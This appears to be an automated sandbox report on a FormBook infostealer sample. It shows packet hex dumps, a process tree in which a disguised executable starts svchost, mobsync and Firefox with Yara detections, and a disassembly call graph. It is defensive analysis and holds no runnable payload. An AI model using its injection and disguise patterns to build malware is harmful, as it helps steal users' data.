                                                      Dec 3, 2024 06:56:40.307985067 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                      Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                      Dec 3, 2024 06:56:40.308043957 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                      Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                      Dec 3, 2024 06:56:40.308054924 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                      Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                      Dec 3, 2024 06:56:40.308063984 CET1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                      Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                      Dec 3, 2024 06:56:40.308073044 CET448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                      Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                      Dec 3, 2024 06:56:40.308398962 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                      Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                      Dec 3, 2024 06:56:40.308408976 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                      Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                      Dec 3, 2024 06:56:40.428014994 CET1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                      Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:00:53:32
                                                      Start date:03/12/2024
                                                      Path:C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                                                      Imagebase:0x7c0000
                                                      File size:1'213'952 bytes
                                                      MD5 hash:36E50660F18927EB838CE85DD46778C4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:00:53:33
                                                      Start date:03/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                                                      Imagebase:0x690000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:00:53:45
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe"
                                                      Imagebase:0xcc0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:00:53:46
                                                      Start date:03/12/2024
                                                      Path:C:\Windows\SysWOW64\mobsync.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                      Imagebase:0x570000
                                                      File size:93'696 bytes
                                                      MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:7
                                                      Start time:00:54:00
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe"
                                                      Imagebase:0xcc0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:00:54:12
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:10.2%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:151
                                                        execution_graph 100479 7c107d 100484 7c708b 100479->100484 100481 7c108c 100515 7e2d40 100481->100515 100485 7c709b __ftell_nolock 100484->100485 100518 7c7667 100485->100518 100489 7c715a 100530 7e050b 100489->100530 100496 7c7667 59 API calls 100497 7c718b 100496->100497 100549 7c7d8c 100497->100549 100499 7c7194 RegOpenKeyExW 100500 7fe8b1 RegQueryValueExW 100499->100500 100505 7c71b6 Mailbox 100499->100505 100501 7fe8ce 100500->100501 100502 7fe943 RegCloseKey 100500->100502 100553 7e0db6 100501->100553 100502->100505 100513 7fe955 _wcscat Mailbox __wsetenvp 100502->100513 100504 7fe8e7 100563 7c522e 100504->100563 100505->100481 100508 7fe90f 100566 7c7bcc 100508->100566 100510 7fe929 100510->100502 100512 7c3f74 59 API calls 100512->100513 100513->100505 100513->100512 100514 7c79f2 59 API calls 100513->100514 100575 7c7de1 100513->100575 100514->100513 100640 7e2c44 100515->100640 100517 7c1096 100519 7e0db6 Mailbox 59 API calls 100518->100519 100520 7c7688 100519->100520 100521 7e0db6 Mailbox 59 API calls 100520->100521 100522 7c7151 100521->100522 100523 7c4706 100522->100523 100579 7f1940 100523->100579 100526 7c7de1 59 API calls 100527 7c4739 100526->100527 100581 7c4750 100527->100581 100529 7c4743 Mailbox 100529->100489 100531 7f1940 __ftell_nolock 100530->100531 100532 7e0518 GetFullPathNameW 100531->100532 100533 7e053a 100532->100533 100534 7c7bcc 59 API calls 100533->100534 100535 7c7165 100534->100535 100536 7c7cab 100535->100536 100537 7c7cbf 100536->100537 100538 7fed4a 100536->100538 100603 7c7c50 100537->100603 100608 7c8029 100538->100608 100541 7c7173 100543 7c3f74 100541->100543 100542 7fed55 __wsetenvp _memmove 100544 7c3f82 100543->100544 100548 7c3fa4 _memmove 100543->100548 100546 7e0db6 Mailbox 59 API calls 100544->100546 100545 7e0db6 Mailbox 59 API calls 100547 7c3fb8 100545->100547 100546->100548 100547->100496 100548->100545 100550 7c7da6 100549->100550 100552 7c7d99 100549->100552 100551 7e0db6 Mailbox 59 API calls 100550->100551 100551->100552 100552->100499 100555 7e0dbe 100553->100555 100556 7e0dd8 100555->100556 100558 7e0ddc std::exception::exception 100555->100558 100611 7e571c 100555->100611 100628 7e33a1 DecodePointer 100555->100628 100556->100504 100629 7e859b RaiseException 100558->100629 100560 7e0e06 100630 7e84d1 58 API calls _free 100560->100630 100562 7e0e18 100562->100504 100564 7e0db6 Mailbox 59 API calls 100563->100564 100565 7c5240 RegQueryValueExW 100564->100565 100565->100508 100565->100510 100567 7c7bd8 __wsetenvp 100566->100567 100568 7c7c45 100566->100568 100570 7c7bee 100567->100570 100571 7c7c13 100567->100571 100569 7c7d2c 59 API calls 100568->100569 100574 7c7bf6 _memmove 100569->100574 100639 7c7f27 59 API calls Mailbox 100570->100639 100573 7c8029 59 API calls 100571->100573 100573->100574 100574->100510 100576 7c7df0 __wsetenvp _memmove 100575->100576 100577 7e0db6 Mailbox 59 API calls 100576->100577 100578 7c7e2e 100577->100578 100578->100513 100580 7c4713 GetModuleFileNameW 100579->100580 100580->100526 100582 7f1940 __ftell_nolock 100581->100582 100583 7c475d GetFullPathNameW 100582->100583 100584 7c477c 100583->100584 100585 7c4799 100583->100585 100587 7c7bcc 59 API calls 100584->100587 100586 7c7d8c 59 API calls 100585->100586 100588 7c4788 100586->100588 100587->100588 100591 7c7726 100588->100591 100592 7c7734 100591->100592 100595 7c7d2c 100592->100595 100594 7c4794 100594->100529 100596 7c7d3a 100595->100596 100597 7c7d43 _memmove 100595->100597 100596->100597 100599 7c7e4f 100596->100599 100597->100594 100600 7c7e62 100599->100600 100602 7c7e5f _memmove 100599->100602 100601 7e0db6 Mailbox 59 API calls 100600->100601 100601->100602 100602->100597 100604 7c7c5f __wsetenvp 100603->100604 100605 7c8029 59 API calls 100604->100605 100606 7c7c70 _memmove 100604->100606 100607 7fed07 _memmove 100605->100607 100606->100541 100609 7e0db6 Mailbox 59 API calls 100608->100609 100610 7c8033 100609->100610 100610->100542 100612 7e5797 100611->100612 100620 7e5728 100611->100620 100637 7e33a1 DecodePointer 100612->100637 100614 7e579d 100638 7e8b28 58 API calls __getptd_noexit 100614->100638 100617 7e575b RtlAllocateHeap 100617->100620 100627 7e578f 100617->100627 100619 7e5733 100619->100620 100631 7ea16b 58 API calls 2 library calls 100619->100631 100632 7ea1c8 58 API calls 7 library calls 100619->100632 100633 7e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100619->100633 100620->100617 100620->100619 100621 7e5783 100620->100621 100625 7e5781 100620->100625 100634 7e33a1 DecodePointer 100620->100634 100635 7e8b28 58 API calls __getptd_noexit 100621->100635 100636 7e8b28 58 API calls __getptd_noexit 100625->100636 100627->100555 100628->100555 100629->100560 100630->100562 100631->100619 100632->100619 100634->100620 100635->100625 100636->100627 100637->100614 100638->100627 100639->100574 100641 7e2c50 type_info::_Type_info_dtor 100640->100641 100648 7e3217 100641->100648 100647 7e2c77 type_info::_Type_info_dtor 100647->100517 100665 7e9c0b 100648->100665 100650 7e2c59 100651 7e2c88 DecodePointer DecodePointer 100650->100651 100652 7e2cb5 100651->100652 100653 7e2c65 100651->100653 100652->100653 100711 7e87a4 59 API calls __strnicmp_l 100652->100711 100662 7e2c82 100653->100662 100655 7e2d18 EncodePointer EncodePointer 100655->100653 100656 7e2cc7 100656->100655 100657 7e2cec 100656->100657 100712 7e8864 61 API calls __realloc_crt 100656->100712 100657->100653 100660 7e2d06 EncodePointer 100657->100660 100713 7e8864 61 API calls __realloc_crt 100657->100713 100660->100655 100661 7e2d00 100661->100653 100661->100660 100714 7e3220 100662->100714 100666 7e9c2f EnterCriticalSection 100665->100666 100667 7e9c1c 100665->100667 100666->100650 100672 7e9c93 100667->100672 100669 7e9c22 100669->100666 100696 7e30b5 58 API calls 3 library calls 100669->100696 100673 7e9c9f type_info::_Type_info_dtor 100672->100673 100674 7e9ca8 100673->100674 100675 7e9cc0 100673->100675 100697 7ea16b 58 API calls 2 library calls 100674->100697 100684 7e9ce1 type_info::_Type_info_dtor 100675->100684 100700 7e881d 58 API calls 2 library calls 100675->100700 100677 7e9cad 100698 7ea1c8 58 API calls 7 library calls 100677->100698 100680 7e9cd5 100682 7e9cdc 100680->100682 100683 7e9ceb 100680->100683 100681 7e9cb4 100699 7e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100681->100699 100701 7e8b28 58 API calls __getptd_noexit 100682->100701 100685 7e9c0b __lock 58 API calls 100683->100685 100684->100669 100688 7e9cf2 100685->100688 100690 7e9cff 100688->100690 100691 7e9d17 100688->100691 100702 7e9e2b InitializeCriticalSectionAndSpinCount 100690->100702 100703 7e2d55 100691->100703 100694 7e9d0b 100709 7e9d33 LeaveCriticalSection _doexit 100694->100709 100697->100677 100698->100681 100700->100680 100701->100684 100702->100694 100704 7e2d5e RtlFreeHeap 100703->100704 100705 7e2d87 __dosmaperr 100703->100705 100704->100705 100706 7e2d73 100704->100706 100705->100694 100710 7e8b28 58 API calls __getptd_noexit 100706->100710 100708 7e2d79 GetLastError 100708->100705 100709->100684 100710->100708 100711->100656 100712->100657 100713->100661 100717 7e9d75 LeaveCriticalSection 100714->100717 100716 7e2c87 100716->100647 100717->100716 100718 7ffdfc 100748 7cab30 Mailbox _memmove 100718->100748 100722 7e0db6 59 API calls Mailbox 100722->100748 100725 7e0db6 59 API calls Mailbox 100746 7c9f37 Mailbox 100725->100746 100726 800055 100808 829e4a 89 API calls 4 library calls 100726->100808 100728 7cb475 100809 7c8047 100728->100809 100731 800064 100733 7cb47a 100733->100726 100745 8009e5 100733->100745 100736 7c7667 59 API calls 100736->100746 100737 7c8047 59 API calls 100737->100746 100739 7ca057 100740 7c7de1 59 API calls 100740->100748 100741 816e8f 59 API calls 100741->100746 100742 8009d6 100818 829e4a 89 API calls 4 library calls 100742->100818 100743 7e2d40 67 API calls __cinit 100743->100746 100819 829e4a 89 API calls 4 library calls 100745->100819 100746->100725 100746->100726 100746->100728 100746->100733 100746->100736 100746->100737 100746->100739 100746->100741 100746->100742 100746->100743 100747 7ca55a 100746->100747 100773 7cc8c0 331 API calls 2 library calls 100746->100773 100774 7cb900 60 API calls Mailbox 100746->100774 100817 829e4a 89 API calls 4 library calls 100747->100817 100748->100722 100748->100739 100748->100740 100748->100746 100751 7cb2b6 100748->100751 100754 80086a 100748->100754 100756 800878 100748->100756 100758 80085c 100748->100758 100759 7cb21c 100748->100759 100763 7cb525 100748->100763 100764 816e8f 59 API calls 100748->100764 100767 83df23 100748->100767 100770 83df37 100748->100770 100775 7c9ea0 100748->100775 100799 7c9c90 59 API calls Mailbox 100748->100799 100803 83c193 85 API calls 2 library calls 100748->100803 100804 83c2e0 96 API calls Mailbox 100748->100804 100805 827956 59 API calls Mailbox 100748->100805 100806 83bc6b 331 API calls Mailbox 100748->100806 100807 81617e 59 API calls Mailbox 100748->100807 100802 7cf6a3 331 API calls 100751->100802 100815 7c9c90 59 API calls Mailbox 100754->100815 100816 829e4a 89 API calls 4 library calls 100756->100816 100758->100739 100814 81617e 59 API calls Mailbox 100758->100814 100800 7c9d3c 60 API calls Mailbox 100759->100800 100761 7cb22d 100801 7c9d3c 60 API calls Mailbox 100761->100801 100813 829e4a 89 API calls 4 library calls 100763->100813 100764->100748 100820 83cadd 100767->100820 100769 83df33 100769->100748 100771 83cadd 130 API calls 100770->100771 100772 83df47 100771->100772 100772->100748 100773->100746 100774->100746 100776 7c9ebf 100775->100776 100795 7c9eed Mailbox 100775->100795 100777 7e0db6 Mailbox 59 API calls 100776->100777 100777->100795 100778 7cb475 100779 7c8047 59 API calls 100778->100779 100792 7ca057 100779->100792 100780 7cb47a 100781 800055 100780->100781 100798 8009e5 100780->100798 100967 829e4a 89 API calls 4 library calls 100781->100967 100785 7e0db6 59 API calls Mailbox 100785->100795 100786 800064 100786->100748 100788 7c7667 59 API calls 100788->100795 100789 7c8047 59 API calls 100789->100795 100791 7e2d40 67 API calls __cinit 100791->100795 100792->100748 100793 816e8f 59 API calls 100793->100795 100794 8009d6 100969 829e4a 89 API calls 4 library calls 100794->100969 100795->100778 100795->100780 100795->100781 100795->100785 100795->100788 100795->100789 100795->100791 100795->100792 100795->100793 100795->100794 100797 7ca55a 100795->100797 100965 7cc8c0 331 API calls 2 library calls 100795->100965 100966 7cb900 60 API calls Mailbox 100795->100966 100968 829e4a 89 API calls 4 library calls 100797->100968 100970 829e4a 89 API calls 4 library calls 100798->100970 100799->100748 100800->100761 100801->100751 100802->100763 100803->100748 100804->100748 100805->100748 100806->100748 100807->100748 100808->100731 100810 7c805a 100809->100810 100811 7c8052 100809->100811 100810->100739 100971 7c7f77 59 API calls 2 library calls 100811->100971 100813->100758 100814->100739 100815->100758 100816->100758 100817->100739 100818->100745 100819->100739 100858 7c9837 100820->100858 100824 83cdb9 100825 83cf2e 100824->100825 100829 83cdc7 100824->100829 100926 83d8c8 92 API calls Mailbox 100825->100926 100828 83cf3d 100828->100829 100830 83cf49 100828->100830 100889 83c96e 100829->100889 100846 83cb61 Mailbox 100830->100846 100831 7c9837 84 API calls 100841 83cbb2 Mailbox 100831->100841 100836 83ce00 100904 7e0c08 100836->100904 100839 83ce33 100911 7c92ce 100839->100911 100840 83ce1a 100910 829e4a 89 API calls 4 library calls 100840->100910 100841->100824 100841->100831 100841->100846 100908 83fbce 59 API calls 2 library calls 100841->100908 100909 83cfdf 61 API calls 2 library calls 100841->100909 100844 83ce25 GetCurrentProcess TerminateProcess 100844->100839 100846->100769 100850 83cfa4 100850->100846 100853 83cfb8 FreeLibrary 100850->100853 100851 83ce6b 100923 83d649 107 API calls _free 100851->100923 100853->100846 100857 83ce7c 100857->100850 100924 7c8d40 59 API calls Mailbox 100857->100924 100925 7c9d3c 60 API calls Mailbox 100857->100925 100927 83d649 107 API calls _free 100857->100927 100859 7c984b 100858->100859 100860 7c9851 100858->100860 100859->100846 100876 83d7a5 100859->100876 100861 7ff5d3 __i64tow 100860->100861 100862 7c9899 100860->100862 100864 7c9857 __itow 100860->100864 100868 7ff4da 100860->100868 100928 7e3698 83 API calls 3 library calls 100862->100928 100866 7e0db6 Mailbox 59 API calls 100864->100866 100869 7c9871 100866->100869 100867 7ff552 Mailbox _wcscpy 100929 7e3698 83 API calls 3 library calls 100867->100929 100868->100867 100870 7e0db6 Mailbox 59 API calls 100868->100870 100869->100859 100871 7c7de1 59 API calls 100869->100871 100873 7ff51f 100870->100873 100871->100859 100872 7e0db6 Mailbox 59 API calls 100874 7ff545 100872->100874 100873->100872 100874->100867 100875 7c7de1 59 API calls 100874->100875 100875->100867 100877 7c7e4f 59 API calls 100876->100877 100878 83d7c0 CharLowerBuffW 100877->100878 100930 81f167 100878->100930 100882 7c7667 59 API calls 100883 83d7f9 100882->100883 100937 7c784b 100883->100937 100885 83d810 100887 7c7d2c 59 API calls 100885->100887 100886 83d858 Mailbox 100886->100841 100888 83d81c Mailbox 100887->100888 100888->100886 100950 83cfdf 61 API calls 2 library calls 100888->100950 100890 83c989 100889->100890 100894 83c9de 100889->100894 100891 7e0db6 Mailbox 59 API calls 100890->100891 100893 83c9ab 100891->100893 100892 7e0db6 Mailbox 59 API calls 100892->100893 100893->100892 100893->100894 100895 83da50 100894->100895 100896 83dc79 Mailbox 100895->100896 100903 83da73 _strcat _wcscpy __wsetenvp 100895->100903 100896->100836 100897 7c9b98 59 API calls 100897->100903 100898 7c9b3c 59 API calls 100898->100903 100899 7c9be6 59 API calls 100899->100903 100900 7c9837 84 API calls 100900->100903 100901 7e571c 58 API calls __crtLCMapStringA_stat 100901->100903 100903->100896 100903->100897 100903->100898 100903->100899 100903->100900 100903->100901 100954 825887 61 API calls 2 library calls 100903->100954 100905 7e0c1d 100904->100905 100906 7e0cb5 VirtualProtect 100905->100906 100907 7e0c83 100905->100907 100906->100907 100907->100839 100907->100840 100908->100841 100909->100841 100910->100844 100912 7c92d6 100911->100912 100913 7e0db6 Mailbox 59 API calls 100912->100913 100914 7c92e4 100913->100914 100915 7c92f0 100914->100915 100955 7c91fc 59 API calls Mailbox 100914->100955 100917 7c9050 100915->100917 100956 7c9160 100917->100956 100919 7e0db6 Mailbox 59 API calls 100921 7c90fb 100919->100921 100920 7c905f 100920->100919 100920->100921 100921->100857 100922 7c8d40 59 API calls Mailbox 100921->100922 100922->100851 100923->100857 100924->100857 100925->100857 100926->100828 100927->100857 100928->100864 100929->100861 100932 81f192 __wsetenvp 100930->100932 100931 81f1d1 100931->100882 100931->100888 100932->100931 100933 81f1c7 100932->100933 100934 81f278 100932->100934 100933->100931 100951 7c78c4 61 API calls 100933->100951 100934->100931 100952 7c78c4 61 API calls 100934->100952 100938 7c785a 100937->100938 100939 7c78b7 100937->100939 100938->100939 100941 7c7865 100938->100941 100940 7c7d2c 59 API calls 100939->100940 100947 7c7888 _memmove 100940->100947 100942 7feb09 100941->100942 100943 7c7880 100941->100943 100944 7c8029 59 API calls 100942->100944 100953 7c7f27 59 API calls Mailbox 100943->100953 100946 7feb13 100944->100946 100948 7e0db6 Mailbox 59 API calls 100946->100948 100947->100885 100949 7feb33 100948->100949 100950->100886 100951->100933 100952->100934 100953->100947 100954->100903 100955->100915 100957 7c9169 Mailbox 100956->100957 100958 7ff19f 100957->100958 100963 7c9173 100957->100963 100959 7e0db6 Mailbox 59 API calls 100958->100959 100961 7ff1ab 100959->100961 100960 7c917a 100960->100920 100963->100960 100964 7c9c90 59 API calls Mailbox 100963->100964 100964->100963 100965->100795 100966->100795 100967->100786 100968->100792 100969->100798 100970->100792 100971->100810 100972 7e7c56 100973 7e7c62 type_info::_Type_info_dtor 100972->100973 101009 7e9e08 GetStartupInfoW 100973->101009 100975 7e7c67 101011 7e8b7c GetProcessHeap 100975->101011 100977 7e7cbf 100978 7e7cca 100977->100978 101094 7e7da6 58 API calls 3 library calls 100977->101094 101012 7e9ae6 100978->101012 100981 7e7cd0 100982 7e7cdb __RTC_Initialize 100981->100982 101095 7e7da6 58 API calls 3 library calls 100981->101095 101033 7ed5d2 100982->101033 100985 7e7cea 100986 7e7cf6 GetCommandLineW 100985->100986 101096 7e7da6 58 API calls 3 library calls 100985->101096 101052 7f4f23 GetEnvironmentStringsW 100986->101052 100989 7e7cf5 100989->100986 100992 7e7d10 100993 7e7d1b 100992->100993 101097 7e30b5 58 API calls 3 library calls 100992->101097 101062 7f4d58 100993->101062 100996 7e7d21 100997 7e7d2c 100996->100997 101098 7e30b5 58 API calls 3 library calls 100996->101098 101076 7e30ef 100997->101076 101000 7e7d34 101001 7e7d3f __wwincmdln 101000->101001 101099 7e30b5 58 API calls 3 library calls 101000->101099 101082 7c47d0 101001->101082 101004 7e7d53 101005 7e7d62 101004->101005 101100 7e3358 58 API calls _doexit 101004->101100 101101 7e30e0 58 API calls _doexit 101005->101101 101008 7e7d67 type_info::_Type_info_dtor 101010 7e9e1e 101009->101010 101010->100975 101011->100977 101102 7e3187 36 API calls 2 library calls 101012->101102 101014 7e9aeb 101103 7e9d3c InitializeCriticalSectionAndSpinCount __getstream 101014->101103 101016 7e9af0 101017 7e9af4 101016->101017 101105 7e9d8a TlsAlloc 101016->101105 101104 7e9b5c 61 API calls 2 library calls 101017->101104 101020 7e9b06 101020->101017 101022 7e9b11 101020->101022 101021 7e9af9 101021->100981 101106 7e87d5 101022->101106 101025 7e9b53 101114 7e9b5c 61 API calls 2 library calls 101025->101114 101028 7e9b32 101028->101025 101030 7e9b38 101028->101030 101029 7e9b58 101029->100981 101113 7e9a33 58 API calls 4 library calls 101030->101113 101032 7e9b40 GetCurrentThreadId 101032->100981 101034 7ed5de type_info::_Type_info_dtor 101033->101034 101035 7e9c0b __lock 58 API calls 101034->101035 101036 7ed5e5 101035->101036 101037 7e87d5 __calloc_crt 58 API calls 101036->101037 101038 7ed5f6 101037->101038 101039 7ed661 GetStartupInfoW 101038->101039 101040 7ed601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101038->101040 101046 7ed676 101039->101046 101049 7ed7a5 101039->101049 101040->100985 101041 7ed86d 101128 7ed87d LeaveCriticalSection _doexit 101041->101128 101043 7e87d5 __calloc_crt 58 API calls 101043->101046 101044 7ed7f2 GetStdHandle 101044->101049 101045 7ed805 GetFileType 101045->101049 101046->101043 101048 7ed6c4 101046->101048 101046->101049 101047 7ed6f8 GetFileType 101047->101048 101048->101047 101048->101049 101126 7e9e2b InitializeCriticalSectionAndSpinCount 101048->101126 101049->101041 101049->101044 101049->101045 101127 7e9e2b InitializeCriticalSectionAndSpinCount 101049->101127 101053 7e7d06 101052->101053 101054 7f4f34 101052->101054 101058 7f4b1b GetModuleFileNameW 101053->101058 101129 7e881d 58 API calls 